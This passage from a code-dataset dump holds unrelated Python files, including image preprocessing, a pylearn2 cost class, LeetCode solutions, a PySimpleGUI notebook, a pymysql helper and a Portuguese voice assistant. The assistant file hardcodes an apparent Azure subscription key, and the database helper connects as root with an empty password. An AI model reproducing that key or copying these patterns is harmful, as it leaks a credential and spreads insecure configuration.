data\n\ttest_imgs_path = data_path # '../../../DATA/data_teeth/test'\n\timg_names = os.listdir(test_imgs_path)\n\tfor img_name in tqdm(img_names,desc='{}'.format('test_preprocess')):\n\t\t# 기본 img\n\t\timg_path = test_imgs_path+'/'+img_name\n\t\timg_gray = np.array(Image.open(img_path).convert('L')) \n\t\timg_h, img_w = img_gray.shape[0], img_gray.shape[1]\n\t\tclahe1 = cv2.createCLAHE(clipLimit=2, tileGridSize=(8,8))\n\t\tclahe2 = cv2.createCLAHE(clipLimit=2, tileGridSize=(30,30))\n\t\timg_cl1 = clahe1.apply(img_gray)\n\t\timg_cl2 = clahe2.apply(img_gray)\n\t\timg_cl_twice = clahe1.apply(img_cl2)\n\t\tfinal = np.dstack((img_cl_twice, img_cl2, img_cl1))\n\t\tsave_img = Image.fromarray(final.astype(np.uint8))\n\t\tsave_img.save('./src/images/test/{}'.format(img_name))","repo_name":"oungji212/Teeth-Challenge","sub_path":"submit_code/src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26481916097","text":"#!/usr/bin/env python3\n\n\nclass CmFilter:\n\n def __init__(self, config):\n if config is not None:\n self.config = config\n else:\n raise ValueError(\"No config given\")\n\n def prefilter(self, card_listings, card):\n offers_to_remove = []\n for offer in card_listings[\"article\"]:\n if self._offer_not_matching_card(offer, card):\n offers_to_remove.append(offer)\n for offer in offers_to_remove:\n card_listings[\"article\"].remove(offer)\n\n def _offer_not_matching_card(self, offer, card):\n ret_val = False\n ret_val = self._country_not_matching(offer, ret_val)\n if not ret_val:\n ret_val = self._playset_not_matching(card, offer, ret_val)\n return ret_val\n\n def _playset_not_matching(self, card, offer, ret_val):\n if offer[\"isPlayset\"] != card[\"isPlayset\"]:\n ret_val = True\n return ret_val\n\n def _country_not_matching(self, offer, ret_val):\n offer_country = 
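\n        # a seller-country mismatch is enough on its own to flag the offer for removal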
offer[\"seller\"][\"address\"][\"country\"]\n if offer_country != self.config[\"listing_static_filter\"][\"seller_country\"]:\n ret_val = True\n return ret_val\n\n def stock_filter(self, card_inventory):\n offers_to_remove = []\n for item in card_inventory[\"article\"]:\n if \"|#00\" in item[\"comments\"]:\n offers_to_remove.append(item)\n for offer in offers_to_remove:\n card_inventory[\"article\"].remove(offer)\n","repo_name":"SoftPofi/cm-boy","sub_path":"cm_boy/CmFilter.py","file_name":"CmFilter.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"70631071849","text":"class Solution(object):\n\tdef productExceptSelf(self, nums):\n \tleft, right = 1, 1\n \tresult = [1] * len(nums)\n \tfor i in range(1, len(nums)):\n \t\tleft *= nums[i - 1]\n \t\tright *= nums[len(nums) - i]\n \t\tresult[i] *= left\n \t\tresult[len(nums) - i - 1] *= right\n \treturn result\n\nif __name__ == \"__main__\":\n\tsolution = Solution()\n\tprint(solution.productExceptSelf([1,2,3,4]), \"[expected: [24,12,8,6]]\")\n\tprint(solution.productExceptSelf([-1,1,0,-3,3]), \"[expected: [0,0,9,0,0]]\")\n","repo_name":"ChiaHaoChangTw/LeetCodePractice","sub_path":"Problem238.py","file_name":"Problem238.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5650852002","text":"\"\"\"\nThe GSNCost class.\n\"\"\"\nfrom functools import wraps\n\nfrom pylearn2.compat import OrderedDict\nfrom pylearn2.costs.cost import Cost\nfrom pylearn2.costs.autoencoder import GSNFriendlyCost\nfrom pylearn2.space import CompositeSpace\nfrom pylearn2.utils import safe_zip\n\n\nclass GSNCost(Cost):\n \"\"\"\n Customizable cost class for GSNs.\n\n Note from IG: the following is not 100% accurate, you can use\n CompositeSpace to model interactions between arbitrarily many\n vectors.\n\n This class currently can only handle datasets with only one or two sets\n of vectors. The get_input_source and get_target_source methods on the model\n instance are called to get the names for the fields in the dataset.\n get_input_source() is used for the name of the first set of vectors and\n get_target_source() is used for the second set of vectors.\n\n The explicit use of get_input_source and get_target_source (and the\n non-existance of similar hooks) is what limits this class to learning\n the joint distribution between only 2 sets of vectors. 
\n\n    Parameters\n    ----------\n    costs : list of (int, double, GSNFriendlyCost or callable) tuples\n        The int component of each tuple is the index of the layer at\n        which we want to compute this cost.\n        The double component of the tuple is the coefficient to associate\n        with the cost.\n        The GSNFriendlyCost instance is the cost that will be computed.\n        If that is a callable rather than an instance of GSN friendly\n        cost, it will be called with 2 arguments: the initial value\n        followed by the reconstructed value.\n        Costs must be of length 1 or 2 (explained in docstring for\n        GSNCost class) and the meaning of the ordering of the costs\n        parameter is explained in the docstring for the mode parameter.\n    walkback : int\n        How many steps of walkback to perform\n    mode : str\n        Must be either 'joint', 'supervised', or 'anti_supervised'.\n        The terms \"input layer\" and \"label layer\" are used below in the\n        description of the modes. The \"input layer\" refers to the layer\n        at the index specified in the first tuple in the costs parameter,\n        and the \"label layer\" refers to the layer at the index specified\n        in the second tuple in the costs parameter.\n        'joint' means setting all of the layers and calculating\n        reconstruction costs.\n        'supervised' means setting just the input layer and attempting to\n        predict the label layer.\n        'anti_supervised' is attempting to predict the input layer given\n        the label layer.\n    \"\"\"\n\n    def __init__(self, costs, walkback=0, mode=\"joint\"):\n        super(GSNCost, self).__init__()\n        self.walkback = walkback\n\n        assert mode in [\"joint\", \"supervised\", \"anti_supervised\"]\n        if mode in [\"supervised\", \"anti_supervised\"]:\n            assert len(costs) == 2\n        self.mode = mode\n\n        msg = \"This is (hopefully) a temporary restriction\"\n        assert len(costs) in [1, 2], msg\n        msg = \"Must have only one cost function per index\"\n        assert len(set(c[0] for c in costs)) == len(costs), msg\n        self.costs = costs\n\n        # convert GSNFriendlyCost instances into just callables\n        for i, cost_tup in enumerate(self.costs):\n            if isinstance(cost_tup[2], GSNFriendlyCost):\n                mutable = list(cost_tup)\n                mutable[2] = cost_tup[2].cost\n                self.costs[i] = tuple(mutable)\n            else:\n                assert callable(cost_tup[2])\n\n    @staticmethod\n    def _get_total_for_cost(idx, costf, init_data, model_output):\n        \"\"\"\n        Computes the total cost contribution from one layer given the full\n        output of the GSN.\n\n        Parameters\n        ----------\n        idx : int\n            init_data and model_output both contain a subset of the layer \\\n            activations at each time step. This is the index of the layer we \\\n            want to evaluate the cost on WITHIN this subset. This is \\\n            generally equal to the idx of the cost function within the \\\n            GSNCost.costs list.\n        costf : callable\n            Function of two variables that computes the cost. The first 
The first \\\n argument is the target value, and the second argument is the \\\n predicted value.\n init_data : list of tensor_likes\n Although only the element at index \"idx\" is accessed/needed, this \\\n parameter is a list so that is can directly handle the data \\\n format from GSN.expr.\n model_output : list of list of tensor_likes\n The output of GSN.get_samples as called by GSNCost.expr.\n \"\"\"\n total = 0.0\n for step in model_output:\n total += costf(init_data[idx], step[idx])\n\n # normalize for number of steps\n return total / len(model_output)\n\n def _get_samples_from_model(self, model, data):\n \"\"\"\n .. todo::\n\n WRITEME properly\n\n Handles the different GSNCost modes.\n \"\"\"\n layer_idxs = [idx for idx, _, _ in self.costs]\n zipped = safe_zip(layer_idxs, data)\n if self.mode == \"joint\":\n use = zipped\n elif self.mode == \"supervised\":\n # don't include label layer\n use = zipped[:1]\n elif self.mode == \"anti_supervised\":\n # don't include features\n use = zipped[1:]\n else:\n raise ValueError(\"Unknown mode \\\"%s\\\" for GSNCost\" % self.mode)\n\n return model.get_samples(use,\n walkback=self.walkback,\n indices=layer_idxs)\n\n def expr(self, model, data):\n \"\"\"\n Theano expression for the cost.\n\n Parameters\n ----------\n model : GSN object\n WRITEME\n data : list of tensor_likes\n Data must be a list or tuple of the same length as self.costs.\n All elements in data must be a tensor_like (cannot be None).\n\n Returns\n -------\n y : tensor_like\n The actual cost that is backpropagated on.\n \"\"\"\n self.get_data_specs(model)[0].validate(data)\n output = self._get_samples_from_model(model, data)\n\n total = 0.0\n for cost_idx, (_, coeff, costf) in enumerate(self.costs):\n total += (coeff *\n self._get_total_for_cost(cost_idx, costf, data, output))\n\n coeff_sum = sum(coeff for _, coeff, _ in self.costs)\n\n # normalize for coefficients on each cost\n return total / coeff_sum\n\n @wraps(Cost.get_monitoring_channels)\n def get_monitoring_channels(self, model, data, **kwargs):\n self.get_data_specs(model)[0].validate(data)\n\n rval = OrderedDict()\n\n # if there's only 1 cost, then no need to split up the costs\n if len(self.costs) > 1:\n output = self._get_samples_from_model(model, data)\n\n rval['reconstruction_cost'] =\\\n self._get_total_for_cost(0, self.costs[0][2], data, output)\n\n rval['classification_cost'] =\\\n self._get_total_for_cost(1, self.costs[1][2], data, output)\n\n return rval\n\n @wraps(Cost.get_data_specs)\n def get_data_specs(self, model):\n # get space for layer i of model\n get_space = lambda i: (model.aes[i].get_input_space() if i == 0\n else model.aes[i - 1].get_output_space())\n\n # get the spaces for layers that we have costs at\n spaces = map(lambda c: get_space(c[0]), self.costs)\n\n sources = [model.get_input_source()]\n if len(self.costs) == 2:\n sources.append(model.get_target_source())\n\n return (CompositeSpace(spaces), tuple(sources))\n","repo_name":"lisa-lab/pylearn2","sub_path":"pylearn2/costs/gsn.py","file_name":"gsn.py","file_ext":"py","file_size_in_byte":8000,"program_lang":"python","lang":"en","doc_type":"code","stars":2743,"dataset":"github-code","pt":"53"} +{"seq_id":"12913965022","text":"# Given an image represented by an N x N matrix, where each pixel in the image is represented by an integer, write a method to rotate thise image by 90 degrees.\n# Can you do this in place?\n# I: N x N matrix\n# 0: N x N matrix - 90 deg, clockwise\n# C: rotate matrix in place\n# E: empty matrix, non square matrix, m.length != 
m[i].length\n# eg [\n# [1,2],\n# [3,4]\n# ] \n# => \n# [\n# [3,1],\n# [4,2]\n# ]\n# First row becomes last column\n# Second row becomes second from last column and so on.\n\nmatrix = [\n [1,2,3,4,],\n [5,6,7,8],\n [9,10,11,12],\n [13,14,15,16],\n]\n\nm_by_n_matrix = [\n [1,2,3,4],\n [5,6,7,8],\n [9,10,11,12],\n [13,14,15,16],\n [17,18,19,20]\n]\n\ndef rotate_m_by_n_matrix(matrix):\n col_length = len(matrix)\n row_length = len(matrix[0])\n rotated_matrix = [[0] * col_length for row in matrix[0]]\n for row_index in range(col_length):\n for column_index in range(row_length):\n destination_row_index = col_length - 1 - row_index\n rotated_matrix[column_index][destination_row_index] = matrix[row_index][column_index]\n return rotated_matrix\n\nassert rotate_m_by_n_matrix(m_by_n_matrix) == [\n [17,13,9,5,1],\n [18,14,10,6,2],\n [19,15,11,7,3],\n [20,16,12,8,4]\n]\n\nassert rotate_m_by_n_matrix(matrix) == [\n [13,9,5,1],\n [14,10,6,2],\n [15,11,7,3],\n [16,12,8,4]\n]\n\n\n\n\n","repo_name":"bibbycodes/data_structures","sub_path":"lib/rotate_matrix.py","file_name":"rotate_matrix.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69997092008","text":"import requests\n\n\nurl_ddg = \"https://api.duckduckgo.com/?q=presidents of the united states&format=json&pretty=1\"\nresp = requests.get(url_ddg)\nrsp_data = resp.json()\n\nfor item in rsp_data:\n print(\"item: \", item)\n print(\"value:\", rsp_data[item])\n pres_list = rsp_data[item]\nprint(\"\\n*********************************************************************************\\n\")\nfor x in rsp_data['RelatedTopics']:\n print(\"entries: \", x)\n","repo_name":"imercadovazquez/PresidentsLab","sub_path":"gitremote/lab_duckduckgo.py","file_name":"lab_duckduckgo.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26527320607","text":"import traceback\n\nimport requests\nimport ujson as json\n\nHTTP_GET = \"get\"\nHTTP_POST = \"post\"\n\n\ndef post(url, params, logger, headers=None):\n return http_do(\"post\", url, params, logger, headers)\n\n\ndef get(url, params, logger, headers=None):\n return http_do(\"get\", url, params, logger, headers)\n\n\ndef http_do(method, url, params, logger, headers=None):\n session_request = requests.Session()\n if headers:\n headers.update({\"Content-Type\": \"application/json\"})\n session_request.headers = headers\n else:\n session_request.headers = {\"Content-Type\": \"application/json\"}\n try:\n if method == \"get\":\n resp = getattr(session_request, \"get\")(url, params=params)\n else:\n resp = getattr(session_request, \"post\")(url, data=json.dumps(params))\n except Exception as e:\n logger.error(traceback.format_exc())\n return False, {\"result\": False, \"message\": str(e)}\n\n if not resp.ok:\n return False, {\"result\": False, \"message\": \"request error, status code: {}\".format(resp.status_code)}\n\n try:\n json_data = resp.json()\n except Exception as e:\n logger.error(traceback.format_exc())\n return False, {\"result\": False, \"message\": str(e)}\n\n return True, json_data\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"pipeline_plugins/components/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"1242501561","text":"import PySimpleGUI as sg\nfrom Notebook import 
Notebook, delete, inserch, update, save, get_all, print_all, get_by_id, filter, title_str\nimport one_note\nimport note_gui\nimport serch\nimport threading\n\ndef Main_Window():\n layout = [\n [sg.Text(\"NOTEBOOK\", font=\"Roboto 25\", justification=\"center\", size=(35, 1))],\n [sg.Push()],\n [sg.Input(justification=\"center\", border_width=\"5\", font=\"Roboto 15\", key=\"input_text\"), sg.Image(\"search.png\", enable_events=True, key=\"search\")],\n [sg.Push()],\n [sg.InputCombo(values=[\"за алфавітом\",\"за датой оновлення\"], key=\"filter\", default_value=\"за датой оновлення\", enable_events=True)],\n ]\n notes = []\n notebooks = get_all()\n for note in notebooks:\n temp = [sg.Push(), sg.Text(title_str(note.title), font=\"Arial\", background_color=\"#0f0f00\", enable_events=True, key=f'note{note.id}', justification=\"center\"), sg.VerticalSeparator(), sg.Text(title_str(note.text), font=\"Arial\", enable_events=True, key=f'notes{note.id}'), sg.Push(), sg.Image(\"delete.png\", size=(25,25), enable_events=True, key=f'del{note.id}'), sg.Push()]\n notes.append(temp)\n notes.append([sg.Text('-'*60, size=(60,1), justification='center')])\n\n\n layout.extend(notes)\n layout.append([sg.Push(), sg.Push(), sg.Push(),sg.Image(\"add-svg.png\", enable_events=True, key=\"add_new\"), sg.Push()])\n window = sg.Window('NoteBook',finalize=True, icon=\"C:\\\\Users\\\\Admin\\\\Desktop\\\\ІТ Харьков\\\\питон\\\\Notebook\\\\notebbok.png\").Layout([[sg.Column(layout,size=(630,400), scrollable=True, element_justification=\"center\", vertical_scroll_only=True,sbar_trough_color='black')]])\n while True:\n event, values = window.read()\n if event == sg.WIN_CLOSED or event == 'Cancel':\n break\n if event == \"search\":\n if len(values['input_text']) > 0:\n notes = inserch(values[\"input_text\"], values[\"filter\"])\n if len(notes)>0:\n window.close()\n serch.serch(notes)\n print(\"Click\")\n\n\n if event == \"filter\":\n print(\"filter\")\n print(values['filter'])\n notes = filter(order=values['filter'])\n print_all(notes)\n\n\n\n\n if event.startswith(\"note\") or event.startswith(\"notes\"):\n if event.startswith('notes'):\n id = int(event[5:len(event)])\n window.close()\n note_gui.Note(id)\n\n\n\n elif event.startswith('note'):\n id = int(event[4:len(event)])\n window.close()\n note_gui.Note(id)\n\n if event.startswith(\"del\"):\n id = int(event[3:len(event)])\n\n delete(get_by_id(id))\n window.close()\n Main_Window()\n print(\"Delete ok\")\n\n\n if event == \"add_new\":\n print(\"ADD\")\n window.close()\n one_note.Add_Note()\n\n\n window.close()\n\n '''\n \n import PySimpleGUI as sg\n from Notebook import Notebook, delete, inserch, update, save, get_all\n \n title = [sg.Text(\"Notebook\", size=(100, 1), text_color=\"#f0f0ff\", font=\"Roboto 25\")]\n \n search = [sg.InputText(key=\"input_search\", size=(50, 5), justification=\"center\"), sg.Image(\"Notebook/search.png\", size=(25,25), enable_events=True, key=\"Image\")]\n \n filter = [sg.InputCombo(values=[\"за алфавітом\",\"за датой оновлення\"], key=\"filter\", default_value=\"за датой оновлення\")]\n \n notes = []\n notebooks = get_all()\n for note in notebooks:\n temp = [sg.Text(note.title, font=\"Arial\", background_color=\"#0f0f00\", enable_events=True, key=f'note{note.id}', justification=\"center\"), sg.VerticalSeparator(), sg.Text(note.text[0:5]+\"...\", font=\"Arial\")]\n notes.append(temp)\n notes.append([sg.Text('-'*60, size=(60,1), justification='center')])\n \n layout = [\n title,\n [sg.HorizontalSeparator()],\n search,\n 
[sg.HorizontalSeparator()],\n filter,\n ]\n layout.extend(notes)\n layout.append([sg.Image(\"Notebook/add-svg.png\", enable_events=True, key=\"add_new\"), sg.Push(), sg.Push()])\n \n window = sg.Window(\"Notebook\" ).Layout([[sg.Column(layout, scrollable=True, size=(450, 450), vertical_scroll_only=True)]])\n event, values = window.read()\n while event not in (None, \"Cancel\"):\n event, value = window.read()\n if event == \"Image\":\n print(\"Click\")\n if event.startswith(\"note\"):\n print(event)\n if event == \"add_new\":\n print(\"ADD\")\n '''\nif __name__ == \"__main__\":\n Main_Window()\n","repo_name":"ElisWhite/notebook","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34859315890","text":"import pymysql\n\n\nclass ComponentRetriever:\n def get_database_connection(self):\n host = \"localhost\"\n user = \"root\"\n password = \"\"\n database = \"JoomlaResearchTestSitedb\"\n try:\n db = pymysql.connect(host, user, password, database)\n return db\n except pymysql.err.DatabaseError as error:\n print(\"Error occurred while connecting to the database. \" + str(error.args[0]) + \" , \" + error.args[1])\n\n def get_article_id(self, article_name):\n try:\n connection = self.get_database_connection()\n article_name = article_name.lower().replace(\" \", \"-\")\n with connection.cursor() as cursor:\n get_article_id_sql = \"SELECT `id` FROM `fa64n_content` WHERE `alias` = %s;\"\n cursor.execute(get_article_id_sql, article_name)\n for id_cursor in cursor:\n return id_cursor[0]\n connection.commit()\n except pymysql.err.DatabaseError as err:\n print(\"Error occurred while the module registration. \" + str(err.args[0]) + \",\" + str(err.args[1]))\n connection.rollback()\n\n def get_last_inserted_menu_item(self):\n try:\n connection = self.get_database_connection()\n with connection.cursor() as cursor:\n get_last_menu_item_sql = \"SELECT `id`, `lft`, `rgt` FROM `fa64n_menu` WHERE `menutype` = %s ORDER BY \" \\\n \"`id` DESC LIMIT 1;\"\n cursor.execute(get_last_menu_item_sql, \"mainmenu\")\n menu_item_details = []\n for cursor_details in cursor:\n menu_item_details.append(cursor_details)\n connection.commit()\n return menu_item_details\n except pymysql.err.DatabaseError as err:\n print(\"Error occurred while the module registration. 
\" + str(err.args[0]) + \",\" + str(err.args[1]))\n connection.rollback()\n\n\n\ncomp_trt = ComponentRetriever()\n# comp_trt.get_article_id(\"Article Test article 004\")\n# details = comp_trt.get_last_inserted_menu_item()\n# for det in details:\n# print(det[1])\n","repo_name":"ShanChathusanda93/python-devs","sub_path":"dbaccess/component_retriever.py","file_name":"component_retriever.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43213775385","text":"from azure.cognitiveservices.speech.audio import AudioOutputConfig\nimport azure.cognitiveservices.speech as speechsdk\nimport speech_recognition as sr\n\nimport importlib\nimport unidecode\n\nfrom minerva import rotinas\nimport comandos\n\nlista_comandos = comandos.lista_comandos\n\ndef receber_lista_comandos_atualizada():\n importlib.reload(comandos)\n importlib.reload(rotinas)\n global lista_comandos\n lista_comandos = comandos.lista_comandos\n return comandos.lista_comandos.keys()\n\ndef executar_rotina(nome_rotina):\n print(\"inicio rotina\")\n comandos = eval(f\"rotinas.{nome_rotina}()\")\n print(comandos)\n for i in comandos:\n run_minerva(input_microfone = False, input_texto = f\"{i}\")\n return \"rotina finalizada\"\n\n\ndef fale(text):\n print(text)\n speech_config = speechsdk.SpeechConfig(subscription=\"9bc9a7005e8f4ab9b42c4ecc13d5680a\",\n region=\"brazilsouth\")\n\n # In this sample we are using the default speaker\n # Learn how to customize your speaker using SSML in Azure Cognitive Services Speech documentation\n\n speech_config.speech_synthesis_language = 'pt-br'\n audio_config = AudioOutputConfig(use_default_speaker=True)\n synthesizer = speechsdk.SpeechSynthesizer(speech_config=speech_config,\n audio_config=audio_config)\n\n synthesizer.speak_text_async(text)\n\n # synthesize_to_speaker()\n\n\ndef receber_variaveis(text):\n fale(text)\n valor = input(text)\n return valor\n\n\ndef receber_audio():\n # print(sr.Microphone.list_microphone_names())\n rec = sr.Recognizer()\n with sr.Microphone() as mic:\n rec.adjust_for_ambient_noise(mic)\n print(\"Estou te ouvindo...\")\n audio = rec.listen(mic)\n\n try:\n print(\"Trancrevendo...\")\n frase = rec.recognize_google(audio, language=\"pt-BR\")\n frase = unidecode.unidecode(frase)\n print(frase)\n return frase.lower()\n except:\n print(\"Erro no recebimento de áudio\")\n return \"erro no recebimento de áudio\"\n\n\ndef run_minerva(input_microfone=False, input_texto=\"\"):\n if input_microfone == True:\n comando = receber_audio()\n else:\n comando = input_texto\n\n#IMPORTANTE LEMBRAR DE COMANDOS COM MAIS ARGUMENTOS [*] MAIS EM CIMA\n print(lista_comandos.keys())\n for chave in lista_comandos.keys():\n if \"*\" in chave: #verifico se o comando precisa de argumentos\n \n argumentos_chave = chave.split() \n #Separo as palavras da chave da lista de comandos\n \n argumentos_comando = comando.split() #Separo as palavras do comando\n try:\n if argumentos_comando[0] == \"minerva\":\n argumentos_comando = argumentos_comando.pop(0) #Retiro a palavra Minerva\n except:\n break\n contem_palavras_necessarias = 0\n palavras_necessarias = len(argumentos_chave) - argumentos_chave.count(\"*\")\n\n for palavra in range(len(argumentos_chave)): #pra cada palavra na chave\n if argumentos_chave[palavra] != \"*\": #se for diferente de *\n if argumentos_chave[palavra] in comando: #vejo se a palavra esta no comando inicial\n contem_palavras_necessarias += 1 #se sim ela tem +1 palavra necessaria pra rodar 
\n                        try:\n                            argumentos_comando.remove(argumentos_chave[palavra]) # remove this word from the command, leaving only the text that is not part of the trigger\n                        except:\n                            break\n            if palavras_necessarias == contem_palavras_necessarias: # if every required word was matched\n                resposta = lista_comandos[chave](' '.join(argumentos_comando))\n                try:\n                    fale(resposta)\n                    return resposta\n                except:\n                    pass\n                break\n\n        elif \"@\" in chave:\n            if chave.replace(\"@ \", \"\") in comando:\n                return executar_rotina(lista_comandos[chave])\n                break\n\n        else:\n\n            if chave in comando:\n                resposta = lista_comandos[chave]()\n                fale(resposta)\n                return resposta\n                break\n\n    else:\n        if comando != \"erro no recebimento de áudio\":\n            lista_comandos[\"pesquise *\"](comando)\n            fale(f'Desculpe, comando não encontrado, mas pesquisei {comando} no google')\n            return f'Desculpe, comando não encontrado, mas pesquisei {comando} no google'\n        else:\n            fale(\"erro no recebimento de áudio\")\n            return \"erro no recebimento de áudio\"\n\ndef teste_microfone():\n    while True:\n        a = receber_audio()\n        print(a)\n\ndef tela():\n    tipo_input = input(\"[1]Microfone [2]Comando: \")\n    if tipo_input == \"1\":\n        run_minerva(input_microfone=True)\n    elif tipo_input == \"2\":\n        run_minerva(input_texto=input(\"Digite seu comando:\"))\n    else:\n        fale(\"opção invalida\")\n\n\n\nif __name__ == \"__main__\":\n    while True:\n        # teste_microfone()\n        importlib.reload(rotinas)\n        importlib.reload(comandos)\n        lista_comandos = comandos.lista_comandos\n        tela()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"FariasMarina/Minerva","sub_path":"minerva/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
{"seq_id":"26393893914","text":"from unittest import TestCase\n\nfrom tic_tac_toe_python_playground.apps.core.dealer import make_move\n\n\nclass Test(TestCase):\n    def test_should_make_move_in_position_4(self):\n        fake_actual_board_to_be_tested = [\n            [0, 1, 2],\n            [3, 4, 5],\n            [5, 7, 8],\n        ]\n        expected_board_result = [\n            [0, 1, 2],\n            [3, \"X\", 5],\n            [5, 7, 8],\n        ]\n        result_board = make_move(fake_actual_board_to_be_tested, 4, \"X\")\n        self.assertEqual(expected_board_result, result_board)\n","repo_name":"wpgalmeida/tic-tac-toe-python-playground","sub_path":"tests/apps/test_dealer.py","file_name":"test_dealer.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"17372669573","text":"# Chapter: 3 \r\n## Converting into grayscale\r\n\r\n# Library Import\r\n\r\nimport cv2 as cv\r\nfrom cv2 import cvtColor #color conversion\r\n\r\nimg = cv.imread(\"FILE PATH\")\r\n\r\n## Conversion\r\ngray_img = cvtColor(img, cv.COLOR_BGR2GRAY)\r\n\r\n#Displays an image in a window.\r\ncv.imshow(\"WINDOWS TEXT\", img)\r\ncv.imshow(\"GrayScale Image\", gray_img)\r\n\r\n\r\ncv.waitKey(0)\r\ncv.destroyAllWindows()","repo_name":"Saadat-Khalid/Learn_OpenCV_by_Saadat-Khalid","sub_path":"03-Chapter_3_Converting_GrayScale.py","file_name":"03-Chapter_3_Converting_GrayScale.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"32002148489","text":"filename = \"input.txt\"\n\n# filename = input()\nt = open(filename, 'rt')\n\nlines = t.readlines()\n\ncount = 0\nans = 0\n\nfor line in lines:\n\twords = line.split(' ')\n\tprint(words[-1])\n\t# if curr > 5000:\n\t# \tcount 
+= 1\n\t# \tans += curr\n\t\n\nmyfile = open( \"bytes_\"+filename, 'w+')\n\nmyfile.write(\"%d\\n\" %count)\nmyfile.write(\"%d\" %ans)","repo_name":"shivamgohri/ds_codes","sub_path":"Temporary/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73147624487","text":"from .editor import View\nfrom copy import deepcopy\nfrom .logging import debug\nfrom .types import ClientConfig, WindowLike\nfrom .types import config_supports_syntax\nfrom .typing import List, Tuple, Optional, Iterator\nfrom .workspace import get_project_config\n\n\ndef get_scope_client_config(view: View, configs: List[ClientConfig],\n point: Optional[int] = None) -> Optional[ClientConfig]:\n return next(get_scope_client_configs(view, configs, point), None)\n\n\ndef get_scope_client_configs(view: View, configs: List[ClientConfig],\n point: Optional[int] = None) -> Iterator[ClientConfig]:\n # When there are multiple server configurations, all of which are for\n # similar scopes (e.g. 'source.json', 'source.json.settings') the\n # configuration with the most specific scope (highest ranked selector)\n # in the current position is preferred.\n if point is None:\n sel = view.sel()\n if len(sel) > 0:\n point = sel[0].begin()\n\n languages = view.settings().get('lsp_language', None)\n scope_configs = [] # type: List[Tuple[ClientConfig, Optional[int]]]\n\n for config in configs:\n if config.enabled:\n if languages is None or config.name in languages:\n for language in config.languages:\n for scope in language.scopes:\n score = 0\n if point is not None:\n score = view.score_selector(point, scope)\n if score > 0:\n scope_configs.append((config, score))\n # debug('scope {} score {}'.format(scope, score))\n\n return (config_score[0] for config_score in sorted(\n scope_configs, key=lambda config_score: config_score[1], reverse=True))\n\n\ndef get_global_client_config(view: View, global_configs: List[ClientConfig]) -> Optional[ClientConfig]:\n return get_scope_client_config(view, global_configs)\n\n\ndef create_window_configs(window: WindowLike, global_configs: List[ClientConfig]) -> List[ClientConfig]:\n window_config = get_project_config(window)\n return list(map(lambda c: apply_project_overrides(c, window_config), global_configs))\n\n\ndef apply_project_overrides(client_config: ClientConfig, lsp_project_settings: dict) -> ClientConfig:\n if client_config.name in lsp_project_settings:\n overrides = lsp_project_settings[client_config.name]\n debug('window has override for {}'.format(client_config.name), overrides)\n client_settings = _merge_dicts(client_config.settings, overrides.get(\"settings\", {}))\n client_env = _merge_dicts(client_config.env, overrides.get(\"env\", {}))\n return ClientConfig(\n client_config.name,\n overrides.get(\"command\", client_config.binary_args),\n overrides.get(\"tcp_port\", client_config.tcp_port),\n [],\n [],\n \"\",\n client_config.languages,\n overrides.get(\"enabled\", client_config.enabled),\n overrides.get(\"initializationOptions\", client_config.init_options),\n client_settings,\n client_env,\n overrides.get(\"tcp_host\", client_config.tcp_host),\n overrides.get(\"experimental_capabilities\", client_config.experimental_capabilities),\n )\n\n return client_config\n\n\ndef is_supported_syntax(syntax: str, configs: List[ClientConfig]) -> bool:\n for config in configs:\n if config_supports_syntax(config, syntax):\n return True\n return False\n\n\ndef _merge_dicts(dict_a: 
dict, dict_b: dict) -> dict:\n \"\"\"Merge dict_b into dict_a with one level of recurse\"\"\"\n result_dict = deepcopy(dict_a)\n for key, value in dict_b.items():\n if isinstance(result_dict.get(key), dict) and isinstance(value, dict):\n result_dict.setdefault(key, {}).update(value)\n else:\n result_dict[key] = value\n return result_dict\n","repo_name":"dcampos/nvim-lfx","sub_path":"rplugin/python3/lfx/core/configurations.py","file_name":"configurations.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37049984643","text":"import pygame\nimport math\nimport heapq\nimport time\n\n\nh = 500\nw = 500\nwhite = (255, 255, 255)\nblue = (0,0, 255)\nyellow = (255, 255, 0)\nred = (255, 0, 0)\nblack = (0, 0, 0)\n\n\nclass Node:\n\n def __init__(self, x, y, endX, endY, theta):\n self.i = x\n self.j = y\n self.theta = theta\n self.costToCome = 0.0\n self.costToGo = 2.5*(math.sqrt((x - endX) ** 2 + (y - endY) ** 2))\n self.cost = None\n self.neighbours = {}\n self.valid_actions = {}\n self.parent = None\n\n def __lt__(self, other):\n return self.cost < other.cost\n\n\nclass 